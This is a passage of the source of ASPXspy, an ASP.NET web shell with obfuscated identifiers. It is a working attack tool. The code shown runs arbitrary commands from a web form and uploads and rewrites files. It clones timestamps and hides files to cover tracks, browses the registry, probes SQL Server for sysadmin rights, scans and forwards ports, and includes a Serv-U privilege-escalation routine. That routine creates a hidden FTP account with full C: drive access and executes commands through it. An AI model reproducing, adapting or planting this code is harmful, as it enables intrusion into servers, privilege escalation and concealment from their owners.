jXkaE.Append("<li><u class=\'u1\'>Server Driver"+i+" : </u><u class=\'u2\'>"+Driver.Rows[i]["Caption"]+"</u> ");

if (Driver.Rows[i]["PathName"]!=string.Empty)

{

jXkaE.Append("Path : "+Driver.Rows[i]["PathName"]);

}

else

{

jXkaE.Append("No path information");

}

jXkaE.Append("</li>");

}

Bin_Ul_Sys.InnerHtml=yEwc.ToString();

Bin_Ul_NetConfig.InnerHtml=hwJeS.ToString();

Bin_Ul_Driver.InnerHtml=jXkaE.ToString();

}

catch(Exception error)

{

xseuB(error.Message);

}

}

public void ADCpk()

{

WICxe();

APl.Visible=true;

Bin_H2_Title.InnerText="Serv-U Exec >>";

}

public void lDODR()

{

string JGGg=string.Empty;

string user=dNohJ.Value;

string pass=NMd.Value;

int port=Int32.Parse(HlQl.Value);

string cmd=mHbjB.Value;

string CRtK="user "+user+"\r\n";

string jnNG="pass "+pass+"\r\n";

string site="SITE MAINTENANCE\r\n";

string mtoJb="-DELETEDOMAIN\r\n-IP=0.0.0.0\r\n PortNo=52521\r\n";

string sutI="-SETDOMAIN\r\n-Domain=BIN|0.0.0.0|52521|-1|1|0\r\n-TZOEnable=0\r\n TZOKey=\r\n";

string iVDT="-SETUSERSETUP\r\n-IP=0.0.0.0\r\n-PortNo=52521\r\n-User=bin\r\n-Password=binftp\r\n-HomeDir=c:\\\r\n-LoginMesFile=\r\n-Disable=0\r\n-RelPaths=1\r\n-NeedSecure=0\r\n-HideHidden=0\r\n-AlwaysAllowLogin=0\r\n-ChangePassword=0\r\n-QuotaEnable=0\r\n-MaxUsersLoginPerIP=-1\r\n-SpeedLimitUp=0\r\n-SpeedLimitDown=0\r\n-MaxNrUsers=-1\r\n-IdleTimeOut=600\r\n-SessionTimeOut=-1\r\n-Expire=0\r\n-RatioDown=1\r\n-RatiosCredit=0\r\n-QuotaCurrent=0\r\n-QuotaMaximum=0\r\n-Maintenance=System\r\n-PasswordType=Regular\r\n-Ratios=NoneRN\r\n Access=c:\\|RWAMELCDP\r\n";

string zexn="QUIT\r\n";

UHlA.Visible=true;

try

{

tcp.Connect("127.0.0.1",port);

tcp.ReceiveBufferSize=1024;

NS=tcp.GetStream();

Rev(NS);

ZJiM(NS,CRtK);

Rev(NS);

ZJiM(NS,jnNG);

Rev(NS);

ZJiM(NS,site);

Rev(NS);

ZJiM(NS,mtoJb);

Rev(NS);

ZJiM(NS,sutI);

Rev(NS);

ZJiM(NS,iVDT);

Rev(NS);

Bin_Td_Res.InnerHtml+="<font color=\"green\"><b>Exec Cmd.................\r\n</b></font>";

zvxm.Connect(Request.ServerVariables["LOCAL_ADDR"],52521);

NS1=zvxm.GetStream();

Rev(NS1);

ZJiM(NS1,"user bin\r\n");

Rev(NS1);

ZJiM(NS1,"pass binftp\r\n");

Rev(NS1);

ZJiM(NS1,"site exec "+cmd+"\r\n");

Rev(NS1);

ZJiM(NS1,"quit\r\n");

Rev(NS1);

zvxm.Close();

ZJiM(NS,mtoJb);

Rev(NS);

tcp.Close();

}

catch(Exception error)

{

xseuB(error.Message);

}

}

protected void Rev(NetworkStream instream)

{

string FTBtf=string.Empty;

if(instream.CanRead)

{

byte[] uPZ=new byte[1024];

do

{

System.Threading.Thread.Sleep(50);

int len=instream.Read(uPZ,0,uPZ.Length);

FTBtf+=Encoding.Default.GetString(uPZ,0,len);

}

while(instream.DataAvailable);

}

Bin_Td_Res.InnerHtml+="<font color=red>"+FTBtf.Replace("\0","")+"</font>";

}

protected void ZJiM(NetworkStream instream,string Sendstr)

{

if(instream.CanWrite)

{

byte[] uPZ=Encoding.Default.GetBytes(Sendstr);

instream.Write(uPZ,0,uPZ.Length);

}

Bin_Td_Res.InnerHtml+="<font color=blue>"+Sendstr+"</font>";

}

public void xFhz()

{

WICxe();

kkHN.Visible=true;

Bin_H2_Title.InnerText="RegShell >>";

string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG";

vyX.Text="";

foreach(string rootkey in txc.Split(\'|\'))

{

vyX.Text+="<a href=\"javascript:Bin_PostBack(\'Bin_Regread\',\'"+MVVJ(rootkey)+"\')\">"+rootkey+"</a> | ";

}

lFAvw();

}

protected void lFAvw()

{

qPdI.Text="";

string txc=@"HKEY_LOCAL_MACHINE|HKEY_CLASSES_ROOT|HKEY_CURRENT_USER|HKEY_USERS|HKEY_CURRENT_CONFIG";

TableRow tr;

TableCell tc;

foreach(string rootkey in txc.Split(\'|\'))

{

tr=new TableRow();

tc=new TableCell();

string bg=OKM();

tr.Attributes["onmouseover"]="this.className=\'focus\';";

tr.CssClass=bg;

tr.Attributes["onmouseout"]="this.className=\'"+bg+"\';";

tc.Width=Unit.Parse("40%");

tc.Text="<a href=\"javascript:Bin_PostBack(\'Bin_Regread\',\'"+MVVJ(rootkey)+"\')\">"+rootkey+"</a>";

tr.Cells.Add(tc);

tc=new TableCell();

tc.Width=Unit.Parse("60%");

tc.Text="<RootKey>";

tr.Cells.Add(tc);

pLWD.Rows.Add(tr);

}

}

protected void tpRQ(string Reg_Path)

{

if(!Reg_Path.EndsWith("\\"))

{

Reg_Path=Reg_Path+"\\";

}

qPdI.Text=Reg_Path;

string cJG=Regex.Replace(Reg_Path,@"\\[^\\]+\\?$","");

cJG=Regex.Replace(cJG,@"\\+","\\");

TableRow tr=new TableRow();

TableCell tc=new TableCell();

string bg=OKM();

tr.Attributes["onmouseover"]="this.className=\'focus\';";

tr.CssClass=bg;

tr.Attributes["onmouseout"]="this.className=\'"+bg+"\';";

tc.Text="<a href=\"javascript:Bin_PostBack(\'Bin_Regread\',\'"+MVVJ(cJG)+"\')\">Parent Key</a>";

tc.Attributes["colspan"]="2" ;

tr.Cells.Add(tc);

pLWD.Rows.Add(tr);

try

{

string subpath;

string kDgkX=Reg_Path.Substring(Reg_Path.IndexOf("\\")+1,Reg_Path.Length-Reg_Path.IndexOf("\\")-1);

RegistryKey rk=null;

RegistryKey sk;

if(Reg_Path.StartsWith("HKEY_LOCAL_MACHINE"))

{

rk=Registry.LocalMachine;

}

else if(Reg_Path.StartsWith("HKEY_CLASSES_ROOT"))

{

rk=Registry.ClassesRoot;

}

else if(Reg_Path.StartsWith("HKEY_CURRENT_USER"))

{

rk=Registry.CurrentUser;

}

else if(Reg_Path.StartsWith("HKEY_USERS"))

{

rk=Registry.Users;

}

else if(Reg_Path.StartsWith("HKEY_CURRENT_CONFIG"))

{

rk=Registry.CurrentConfig;

}

if(kDgkX.Length>1)

{

sk=rk.OpenSubKey(kDgkX);

}

else

{

sk=rk;

}

foreach(string innerSubKey in sk.GetSubKeyNames())

{

tr=new TableRow();

tc=new TableCell();

bg=OKM();

tr.Attributes["onmouseover"]="this.className=\'focus\';";

tr.CssClass=bg;

tr.Attributes["onmouseout"]="this.className=\'"+bg+"\';";

tc.Width=Unit.Parse("40%");

tc.Text="<a href=\"javascript:Bin_PostBack(\'Bin_Regread\',\'"+MVVJ(Reg_Path+innerSubKey)+"\')\">"+innerSubKey+"</a>";

tr.Cells.Add(tc);

tc=new TableCell();

tc.Width=Unit.Parse("60%");

tc.Text="<SubKey>";

tr.Cells.Add(tc);

pLWD.Rows.Add(tr);

}

TableRow cKVA=new TableRow();

cKVA.Attributes["style"]="border-top:1px solid #fff;border-bottom:1px solid #ddd;";

cKVA.Attributes["bgcolor"]="#dddddd";

TableCell JlmW=new TableCell();

JlmW.Attributes["colspan"]="2" ;

JlmW.Attributes["height"]="5";

cKVA.Cells.Add(JlmW);

pLWD.Rows.Add(cKVA);

foreach(string strValueName in sk.GetValueNames())

{

tr=new TableRow();

tc=new TableCell();

bg=OKM();

tr.Attributes["onmouseover"]="this.className=\'focus\';";

tr.CssClass=bg;

tr.Attributes["onmouseout"]="this.className=\'"+bg+"\';";

tc.Width=Unit.Parse("40%");

tc.Text=strValueName;

tr.Cells.Add(tc);

tc=new TableCell();

tc.Width=Unit.Parse("60%");

tc.Text=DdmPl(sk,strValueName);

tr.Cells.Add(tc);

pLWD.Rows.Add(tr);

}

}

catch(Exception error)

{

xseuB(error.Message);

}

}

public string DdmPl(RegistryKey sk,string strValueName)

{

object uPZ;

string RaTGr="";

try

{

uPZ=sk.GetValue(strValueName,"NULL");

if(uPZ.GetType()==typeof(byte[]))

{

foreach(byte tmpbyte in(byte[])uPZ)

{

if((int)tmpbyte<16)

{

RaTGr+="0";

}

RaTGr+=tmpbyte.ToString("X");

}

}

else if(uPZ.GetType()==typeof(string[]))

{

foreach(string tmpstr in(string[])uPZ)

{

RaTGr+=tmpstr;

}

}

else

{

RaTGr=uPZ.ToString();

}

}

catch(Exception error)

{

xseuB(error.Message);

}

return RaTGr;

}

public void vNCHZ()

{

WICxe();

YwLB.Visible=true;

Bin_H2_Title.InnerText="PortScan >>";

}

public void rAhe()

{

WICxe();

iDgmL.Visible=true;

dQIIF.Visible=false;

Bin_H2_Title.InnerText="DataBase >>";

}

protected void OUj()

{

if(Dtdr.State==ConnectionState.Closed)

{

try

{

Dtdr.ConnectionString=MasR.Text;

Kkvb.Connection=Dtdr;

Dtdr.Open();

}

catch(Exception Error)

{

xseuB(Error.Message);

}

}

}

protected void fUzE()

{

if(Dtdr.State==ConnectionState.Open)

Dtdr.Close();

Dtdr.Dispose();

Kkvb.Dispose();

}

public DataTable CYUe(string sqlstr)

{

OleDbDataAdapter da=new OleDbDataAdapter();

DataTable Dstog=new DataTable();

try

{

OUj();

Kkvb.CommandType=CommandType.Text;

Kkvb.CommandText=sqlstr;

da.SelectCommand=Kkvb;

da.Fill(Dstog);

}

catch(Exception)

{

}

finally

{

fUzE();

}

return Dstog;

}

public DataTable[] Bin_Data(string query)

{

ArrayList list=new ArrayList();

try

{

string str;

OUj();

query=query+"\r\n";

MatchCollection gcod=new Regex("[\r\n][gG][oO][\r\n]").Matches(query);

int EmRX=0;

for(int i=0;i<gcod.Count;i++)

{

Match FJD=gcod[i];

str=query.Substring(EmRX,FJD.Index-EmRX);

if(str.Trim().Length>0)

{

OleDbDataAdapter FgzeQ=new OleDbDataAdapter();

Kkvb.CommandType=CommandType.Text;

Kkvb.CommandText=str.Trim();

FgzeQ.SelectCommand=Kkvb;

DataSet cDPp=new DataSet();

FgzeQ.Fill(cDPp);

for(int j=0;j<cDPp.Tables.Count;j++)

{

list.Add(cDPp.Tables[j]);

}

}

EmRX=FJD.Index+3;

}

str=query.Substring(EmRX,query.Length-EmRX);

if(str.Trim().Length>0)

{

OleDbDataAdapter VwB=new OleDbDataAdapter();

Kkvb.CommandType=CommandType.Text;

Kkvb.CommandText=str.Trim();

VwB.SelectCommand=Kkvb;

DataSet arG=new DataSet();

VwB.Fill(arG);

for(int k=0;k<arG.Tables.Count;k++)

{

list.Add(arG.Tables[k]);

}

}

}

catch(SqlException e)

{

xseuB(e.Message);

rom.Visible=false;

}

return(DataTable[])list.ToArray(typeof(DataTable));

}

public void JIAKU(string instr)

{

try

{

OUj();

Kkvb.CommandType=CommandType.Text;

Kkvb.CommandText=instr;

Kkvb.ExecuteNonQuery();

}

catch(Exception e)

{

xseuB(e.Message);

}

}

public void dwgT()

{

try

{

OUj();

if(WYmo.SelectedItem.Text=="MSSQL")

{

if(Pvf.SelectedItem.Value!="")

{

Dtdr.ChangeDatabase(Pvf.SelectedItem.Value.ToString());

}

}

DataTable[] jxF=null;

jxF=Bin_Data(jHIy.InnerText);

if(jxF!=null && jxF.Length>0)

{

for(int j=0;j<jxF.Length;j++)

{

rom.PreRender+=new EventHandler(lRavM);

rom.DataSource=jxF[j];

rom.DataBind();

for(int i=0;i<rom.Items.Count;i++)

{

string bg=OKM();

rom.Items[i].CssClass=bg;

rom.Items[i].Attributes["onmouseover"]="this.className=\'focus\';";

rom.Items[i].Attributes["onmouseout"]="this.className=\'"+bg+"\';";

}

}

}

else

{

rom.DataSource=null;

rom.DataBind();

}

rom.Visible=true;

}

catch(Exception e)

{

xseuB(e.Message);

rom.Visible=false;

}

}

public void xTZY()

{

try

{

if(WYmo.SelectedItem.Text=="MSSQL")

{

if(Pvf.SelectedItem.Value=="")

{

rom.DataSource=null;

rom.DataBind();

return;

}

}

OUj();

DataTable zKvOw=new DataTable();

DataTable jxF=new DataTable();

DataTable baVJV=new DataTable();

if(WYmo.SelectedItem.Text=="MSSQL" && Pvf.SelectedItem.Value!="")

{

Dtdr.ChangeDatabase(Pvf.SelectedItem.Text);

}

zKvOw=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"SYSTEM TABLE" });

jxF=Dtdr.GetOleDbSchemaTable(OleDbSchemaGuid.Tables,new Object[] { null,null,null,"TABLE" });

foreach(DataRow dr in zKvOw.Rows)

{

jxF.ImportRow(dr);

}

jxF.Columns.Remove("TABLE_CATALOG");jxF.Columns.Remove("TABLE_SCHEMA");jxF.Columns.Remove("DESCRIPTION");jxF.Columns.Remove("TABLE_PROPID");

rom.PreRender+=new EventHandler(lRavM);

rom.DataSource=jxF;

rom.DataBind();

for(int i=0;i<rom.Items.Count;i++)

{

string bg=OKM();

rom.Items[i].CssClass=bg;

rom.Items[i].Attributes["onmouseover"]="this.className=\'focus\';";

rom.Items[i].Attributes["onmouseout"]="this.className=\'"+bg+"\';";

}

rom.Visible=true;

}

catch(Exception e)

{

xseuB(e.Message);

rom.Visible=false;

}

}

private void lRavM(object sender,EventArgs e)

{

DataGrid d=(DataGrid)sender;

foreach(DataGridItem item in d.Items)

{

foreach(TableCell t in item.Cells)

{

t.Text=t.Text.Replace("<","<").Replace(">",">");

}

}

}

public void vCf()

{

dQIIF.Visible=true;

try

{

jHIy.InnerHtml=string.Empty;

if(WYmo.SelectedItem.Text=="MSSQL")

{

rom.Visible=false;

uXevN.Visible=true;

irTU.Visible=true;

OUj();

DataTable ver=CYUe(@"SELECT @@VERSION");

DataTable dbs=CYUe(@"SELECT name FROM master.dbo.sysdatabases");

DataTable cdb=CYUe(@"SELECT DB_NAME()");

DataTable rol=CYUe(@"SELECT IS_SRVROLEMEMBER(\'sysadmin\')");

DataTable YKrm=CYUe(@"SELECT IS_MEMBER(\'db_owner\')");

string jHlh=ver.Rows[0][0].ToString();

string dbo=string.Empty;

if(YKrm.Rows[0][0].ToString()=="1")

{

dbo="db_owner";

}

else

{

dbo="public";

}

if(rol.Rows[0][0].ToString()=="1")

{

dbo="<font color=blue>sa</font>";

}

string db_name=string.Empty;

foreach(ListItem item in FGEy.Items)

{

if(item.Selected=true)

{

item.Selected=false;

}

}

Pvf.Items.Clear();

Pvf.Items.Add("-- Select a DataBase --");

Pvf.Items[0].Value="";

for(int i=0;i<dbs.Rows.Count;i++)

{

db_name+=dbs.Rows[i][0].ToString().Replace(cdb.Rows[0][0].ToString(),"<font color=blue>"+cdb.Rows[0][0].ToString()+"</font>")+" | ";

Pvf.Items.Add(dbs.Rows[i][0].ToString());

}

irTU.InnerHtml="<p><font color=red>MSSQL Version</font> : <i><b>"+jHlh+"</b></i></p><p><font color=red>SrvRoleMember</font> : <i><b>"+dbo+"</b></i></p>";

}

else

{

uXevN.Visible=false;

irTU.Visible=false;

xTZY();

}

}

catch(Exception e)

{

dQIIF.Visible=false;

}

}

public void MHLv()

{

WICxe();

hOWTm.Visible=true;

Bin_H2_Title.InnerText="PortMap >>";

}

public class PortForward

{

public string Localaddress;

public int LocalPort;

public string RemoteAddress;

public int RemotePort;

string type;

Socket ltcpClient;

Socket rtcpClient;

Socket server;

byte[] DPrPL=new byte[2048];

byte[] wvZv=new byte[2048];

public struct session

{

public Socket rdel;

public Socket ldel;

public int llen;

public int rlen;

}

public static IPEndPoint mtJ(string host,int port)

{

IPEndPoint iep=null;

IPHostEntry aGN=Dns.Resolve(host);

IPAddress rmt=aGN.AddressList[0];

iep=new IPEndPoint(rmt,port);

return iep;

}

public void Start(string Rip,int Rport,string lip,int lport)

{

try

{

LocalPort=lport;

RemoteAddress=Rip;

RemotePort=Rport;

Localaddress=lip;

rtcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);

ltcpClient=new Socket(AddressFamily.InterNetwork,SocketType.Stream,ProtocolType.Tcp);

rtcpClient.BeginConnect(mtJ(RemoteAddress,RemotePort),new AsyncCallback(iiGFO),rtcpClient);

}

catch (Exception ex) { }

}

protected void iiGFO(IAsyncResult ar)

{

try

{

session RKXy=new session();

RKXy.ldel=ltcpClient;

RKXy.rdel=rtcpClient;

ltcpClient.BeginConnect(mtJ(Localaddress,LocalPort),new AsyncCallback(VTp),RKXy);

}

catch (Exception ex) { }

}

protected void VTp(IAsyncResult ar)

{

try

{

session RKXy=(session)ar.AsyncState;

ltcpClient.EndConnect(ar);

RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(LFYM),RKXy);

RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(xPS),RKXy);

}

catch (Exception ex) { }

}

private void LFYM(IAsyncResult ar)

{

try

{

session RKXy=(session)ar.AsyncState;

int Ret=RKXy.rdel.EndReceive(ar);

if (Ret>0)

ltcpClient.BeginSend(DPrPL,0,Ret,SocketFlags.None,new AsyncCallback(JTcp),RKXy);

else lyTOK();

}

catch (Exception ex) { }

}

private void JTcp(IAsyncResult ar)

{

try

{

session RKXy=(session)ar.AsyncState;

RKXy.ldel.EndSend(ar);

RKXy.rdel.BeginReceive(DPrPL,0,DPrPL.Length,SocketFlags.None,new AsyncCallback(this.LFYM),RKXy);

}

catch (Exception ex) { }

}

private void xPS(IAsyncResult ar)

{

try

{

session RKXy=(session)ar.AsyncState;

int Ret=RKXy.ldel.EndReceive(ar);

if (Ret>0)

RKXy.rdel.BeginSend(wvZv,0,Ret,SocketFlags.None,new AsyncCallback(IZU),RKXy);

else lyTOK();

}

catch (Exception ex) { }

}

private void IZU(IAsyncResult ar)

{

try

{

session RKXy=(session)ar.AsyncState;

RKXy.rdel.EndSend(ar);

RKXy.ldel.BeginReceive(wvZv,0,wvZv.Length,SocketFlags.None,new AsyncCallback(this.xPS),RKXy);

}

catch (Exception ex) { }

}

public void lyTOK()

{

try

{

if (ltcpClient!=null)

{

ltcpClient.Close();

}

if (rtcpClient!=null)

rtcpClient.Close();

}

catch (Exception ex) { }

}

}

protected void vuou()

{

PortForward gYP=new PortForward();

gYP.lyTOK();

}

protected void ruQO()

{

PortForward gYP=new PortForward();

gYP.Start(llH.Value,int.Parse(ZHS.Value),eEpm.Value,int.Parse(iXdh.Value));

}

public string mRDl(string instr)

{

string tmp=null;

try

{

tmp=System.Net.Dns.Resolve(instr).AddressList[0].ToString();

}

catch(Exception e)

{

}

return tmp;

}

public void VikG()

{

string[] OTV=lOmX.Text.ToString().Split(\',\');

for(int i=0;i<OTV.Length;i++)

{

IVc.Add(new ScanPort(mRDl(MdR.Text.ToString()),Int32.Parse(OTV[i])));

}

try

{

Thread[] kbXY=new Thread[IVc.Count];

int sdO=0;

for(sdO=0;sdO<IVc.Count;sdO++)

{

kbXY[sdO]=new Thread(new ThreadStart(((ScanPort)IVc[sdO]).Scan));

kbXY[sdO].Start();

}

for(sdO=0;sdO<kbXY.Length;sdO++)

kbXY[sdO].Join();

}

catch

{

}

}

public class ScanPort

{

private string _ip="";

private int jTdO=0;

private TimeSpan _timeSpent;

private string QGcH="Not scanned";

public string ip

{

get { return _ip;}

}

public int port

{

get { return jTdO;}

}

public string status

{

get { return QGcH;}

}

public TimeSpan timeSpent

{

get { return _timeSpent;}

}

public ScanPort(string ip,int port)

{

_ip=ip;

jTdO=port;

}

public void Scan()

{

TcpClient iYap=new TcpClient();

DateTime qYZT=DateTime.Now;

try

{

iYap.Connect(_ip,jTdO);

iYap.Close();

QGcH="<font color=green><b>Open</b></font>";

}

catch

{

QGcH="<font color=red><b>Close</b></font>";

}

_timeSpent=DateTime.Now.Subtract(qYZT);

}

}

public static void YFcNP(System.Web.UI.Page page)

{

page.RegisterHiddenField("__EVENTTARGET","");

page.RegisterHiddenField("__FILE","");

string s=@"<script language=Javascript>";

s+=@"function Bin_PostBack(eventTarget,eventArgument)";

s+=@"{";

s+=@"var theform=document.forms[0];";

s+=@"theform.__EVENTTARGET.value=eventTarget;";

s+=@"theform.__FILE.value=eventArgument;";

s+=@"theform.submit();";

s+=@"} ";

s+=@"</scr"+"ipt>";

page.RegisterStartupScript("",s);

}

protected void PPtK(object sender,EventArgs e)

{

WICxe();

yhv.Visible=true;

Bin_H2_Title.InnerText="File Search >>";

NaLJ.Value=Request.PhysicalApplicationPath;

oJiym.Visible=false;

}

protected void NBy(object sender,EventArgs e)

{

DirectoryInfo GQMM=new DirectoryInfo(NaLJ.Value);

if(!GQMM.Exists)

{

xseuB("Path invalid ! ");

return;

}

oog(GQMM);

xseuB("Search completed ! ");

}

public void oog(DirectoryInfo dir)

{

try

{

oJiym.Visible=true;

foreach(FileInfo Bin_Files in dir.GetFiles())

{

try

{

if(Bin_Files.FullName==Request.PhysicalPath)

{

continue;

}

if(!Regex.IsMatch(Bin_Files.Extension.Replace(".",""),"^("+UDLvA.Value+")$",RegexOptions.IgnoreCase))

{

continue;

}

if(Ven.SelectedItem.Value=="name")

{

if(rAQ.Checked)

{

if(Regex.IsMatch(Bin_Files.Name,iaMKl.Value,RegexOptions.IgnoreCase))

{

FJvQ(Bin_Files);

}

}

else

{

if(Bin_Files.Name.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1)

{

Response.Write(Bin_Files.FullName);

FJvQ(Bin_Files);

}

}

}

else

{

StreamReader sr=new StreamReader(Bin_Files.FullName,Encoding.Default);

string ava=sr.ReadToEnd();

sr.Close();

if(rAQ.Checked)

{

if(Regex.IsMatch(ava,iaMKl.Value,RegexOptions.IgnoreCase))

{

FJvQ(Bin_Files);

if(YZw.Checked)

{

ava=Regex.Replace(ava,iaMKl.Value,qPe.Value,RegexOptions.IgnoreCase);

StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default);

sw.Write(ava);

sw.Close();

}

}

}

else

{

if(ava.ToLower().IndexOf(iaMKl.Value.ToLower())!=-1)

{

FJvQ(Bin_Files);

if(YZw.Checked)

{

ava=Strings.Replace(ava,iaMKl.Value,qPe.Value,1,-1,CompareMethod.Text);

StreamWriter sw=new StreamWriter(Bin_Files.FullName,false,Encoding.Default);

sw.Write(ava);

sw.Close();

}

}

}

}

}

catch(Exception ex)

{

xseuB(ex.Message);

continue;

}

}

foreach(DirectoryInfo subdir in dir.GetDirectories())

{

oog(subdir);

}

}

catch(Exception ex)

{

xseuB(ex.Message);

}

}

public void FJvQ(FileInfo objfile)

{

TableRow tr=new TableRow();

TableCell tc=new TableCell();

string bg=OKM();

tr.Attributes["onmouseover"]="this.className=\'focus\';";

tr.CssClass=bg;

tr.Attributes["onmouseout"]="this.className=\'"+bg+"\';";

tc.Text="<a href=\"javascript:Bin_PostBack(\'Bin_Listdir\',\'"+MVVJ(objfile.DirectoryName)+"\')\">"+objfile.FullName+"</a>";

tr.Cells.Add(tc);

tc=new TableCell();

tc.Text=objfile.LastWriteTime.ToString();

tr.Cells.Add(tc);

tc=new TableCell();

tc.Text=mTG(objfile.Length);

tr.Cells.Add(tc);

oJiym.Rows.Add(tr);

}

public void xseuB(string instr)

{

jDKt.Visible=true;

jDKt.InnerText=instr;

}

protected void xVm(object sender,EventArgs e)

{

string Jfm=FormsAuthentication.HashPasswordForStoringInConfigFile(HRJ.Text,"MD5").ToLower();

if(Jfm==Password)

{

Response.Cookies.Add(new HttpCookie(vbhLn,Password));

ljtzC.Visible=false;

PBZw();

}

else

{

tZSx();

}

}

protected void Ybg(object sender,EventArgs e)

{

krIR(Server.MapPath("."));

}

protected void KjPi(object sender,EventArgs e)

{

Bin_H2_Title.InnerText="IIS Spy >>";

WICxe();

VNR.Visible=true;

AdCx();

}

protected void DGCoW(object sender,EventArgs e)

{

try

{

StreamWriter sw;

if(NdCX.SelectedItem.Text=="UTF-8")

{

sw=new StreamWriter(Sqon.Value,false,Encoding.UTF8);

}

else

{

sw=new StreamWriter(Sqon.Value,false,Encoding.Default);

}

sw.Write(Xgvv.InnerText);

sw.Close();

xseuB("Save file success !");

}

catch(Exception error)

{

xseuB(error.Message);

}

krIR(AXSbb.Value);

}

protected void lbjLD(object sender,EventArgs e)

{

string FlwA=AXSbb.Value;

FlwA=OElM(FlwA);

try

{

Fhq.PostedFile.SaveAs(FlwA+Path.GetFileName(Fhq.Value));

xseuB("File upload success!");

}

catch(Exception error)

{

xseuB(error.Message);

}

krIR(AXSbb.Value);

}

protected void EXV(object sender,EventArgs e)

{

krIR(AXSbb.Value);

}

protected void mcCY(object sender,EventArgs e)

{

krIR(Server.MapPath("."));

}

protected void iVk(object sender,CommandEventArgs e)

{

krIR(e.CommandArgument.ToString());

}

protected void XXrLw(object sender,EventArgs e)

{

try

{

File.SetCreationTimeUtc(QiFB.Value,File.GetCreationTimeUtc(lICp.Value));

File.SetLastAccessTimeUtc(QiFB.Value,File.GetLastAccessTimeUtc(lICp.Value));

File.SetLastWriteTimeUtc(QiFB.Value,File.GetLastWriteTimeUtc(lICp.Value));

xseuB("File time clone success!");

}

catch(Exception error)

{

xseuB(error.Message);

}

krIR(AXSbb.Value);

}

protected void tIykC(object sender,EventArgs e)

{

string path=pWVL.Value;

try

{

File.SetAttributes(path,FileAttributes.Normal);

if(ZhWSK.Checked)

{

File.SetAttributes(path,FileAttributes.ReadOnly);

}

if(SsR.Checked)

{

File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.System);

}

if(ccB.Checked)

{

File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Hidden);

}

if(fbyZ.Checked)

{

File.SetAttributes(path,File.GetAttributes(path)| FileAttributes.Archive);

}

File.SetCreationTimeUtc(path,Convert.ToDateTime(yUqx.Value));

File.SetLastAccessTimeUtc(path,Convert.ToDateTime(aLsn.Value));

File.SetLastWriteTimeUtc(path,Convert.ToDateTime(uYjw.Value));

xseuB("File attributes modify success!");

}

catch(Exception error)

{

xseuB(error.Message);

}

krIR(AXSbb.Value);

}

protected void VOxn(object sender,EventArgs e)

{

WICxe();

vIac.Visible=true;

Bin_H2_Title.InnerText="Execute Command >>";

}

protected void FbhN(object sender,EventArgs e)

{

try

{

Process ahAE=new Process();

ahAE.StartInfo.FileName=kusi.Value;

ahAE.StartInfo.Arguments=bkcm.Value;

ahAE.StartInfo.UseShellExecute=false;

ahAE.StartInfo.RedirectStandardInput=true;

ahAE.StartInfo.RedirectStandardOutput=true;

ahAE.StartInfo.RedirectStandardError=true;

ahAE.Start();

string Uoc=ahAE.StandardOutput.ReadToEnd();

Uoc=Uoc.Replace("<","<");

Uoc=Uoc.Replace(">",">");

Uoc=Uoc.Replace("\r\n","<br>");

tnQRF.Visible=true;

tnQRF.InnerHtml="<hr width=\"100%\" noshade/><pre>"+Uoc+"</pre>";

}

catch(Exception error)

{

xseuB(error.Message);

}

}

protected void RAFL(object sender,EventArgs e)

{

if(qPdI.Text.Length>0)

{

tpRQ(qPdI.Text);

}

else

{

lFAvw();

}

}

protected void Grxk(object sender,EventArgs e)

{

YUw();

}

protected void ilC(object sender,EventArgs e)

{

tZRH();

}

protected void HtB(object sender,EventArgs e)

{

pDVM();

}

protected void Olm(object sender,EventArgs e)

{

iLVUT();

}

protected void jXhS(object sender,EventArgs e)

{

ADCpk();

}

protected void lRfRj(object sender,EventArgs e)

{

lDODR();

}

protected void xSy(object sender,EventArgs e)

{

xFhz();

}

protected void dMx(object sender,EventArgs e)

{

rAhe();

}

protected void zOVO(object sender,EventArgs e)

{

if(((DropDownList)sender).ID.ToString()=="WYmo")

{

dQIIF.Visible=false;

MasR.Text=WYmo.SelectedItem.Value.ToString();

}

if(((DropDownList)sender).ID.ToString()=="Pvf")

{

xTZY();

}

if(((DropDownList)sender).ID.ToString()=="FGEy")

{

jHIy.InnerText=FGEy.SelectedItem.Value.ToString();

}

if(((DropDownList)sender).ID.ToString()=="NdCX")

{

gLKc(Sqon.Value);

}

}

protected void IkkO(object sender,EventArgs e)

{

krIR(AXSbb.Value);

}

protected void BGY(object sender,EventArgs e)

{

vCf();

}

protected void cptS(object sender,EventArgs e)

{

vNCHZ();

}

protected void fDO(object sender,EventArgs e)

{

MHLv();

}

protected void vJNsE(object sender,EventArgs e)

{

vuou();

xseuB("Clear All Thread ......");

}

protected void wDZ(object sender,EventArgs e)

{

if(iXdh.Value=="" || eEpm.Value.Length<7 || ZHS.Value=="")return;

ruQO();

xseuB("All Thread Start ......");

}

protected void tYoZ(object sender,EventArgs e)

{

}

protected void ELkQ(object sender,EventArgs e)

{

VikG();

GBYT.Visible=true;

string res=string.Empty;

foreach(ScanPort th in IVc)

{

res+=th.ip+" : "+th.port+" ................................. "+th.status+"<br>";

}

GBYT.InnerHtml=res;

}

protected void ORUgV(object sender,EventArgs e)

{

dwgT();

}

public void WICxe()

{

DCbS.Visible=false;

CzfO.Visible=false;

APl.Visible=false;

vIac.Visible=false;

kkHN.Visible=false;

YwLB.Visible=false;

iDgmL.Visible=false;

hOWTm.Visible=false;

vrFA.Visible=false;

yhv.Visible=false;

}

</script>

<html xmlns="http://www.w3.org/1999/xhtml" >

<head id="Head1" runat="server">

<meta http-equiv="Content-Type" content="text/html;charset=utf-8"/>

<title>ASPXspy</title>

<style type="text/css">

.Bin_Style_Login{font:11px Verdana;BACKGROUND: #FFFFFF;border: 1px solid #666666;}

body,td{font: 12px Arial,Tahoma;line-height: 16px;}

.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:16px;}

.list{font:12px Arial,Tahoma;height:23px;}

.area{font:12px \'Courier New\',Monospace;background:#fff;border: 1px solid #666;padding:2px;}

